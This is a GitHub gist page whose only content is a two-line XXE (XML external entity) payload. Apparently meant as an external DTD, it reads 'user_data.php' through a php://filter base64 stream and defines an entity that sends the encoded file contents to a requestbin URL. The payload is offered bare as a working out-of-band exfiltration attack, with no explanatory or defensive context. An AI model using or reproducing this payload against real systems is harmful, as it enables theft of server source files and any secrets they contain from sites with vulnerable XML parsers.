Skip to content

Instantly share code, notes, and snippets.

@icot
Last active June 3, 2018 16:40
Show Gist options
  • Save icot/77729a137d40c97b833105911c78acc9 to your computer and use it in GitHub Desktop.
Save icot/77729a137d40c97b833105911c78acc9 to your computer and use it in GitHub Desktop.
<!ENTITY % payl SYSTEM "php://filter/convert.base64-encode/resource=user_data.php">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://requestbin.fullcontact.com/1k7wnmd1?p=%payl;'>">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment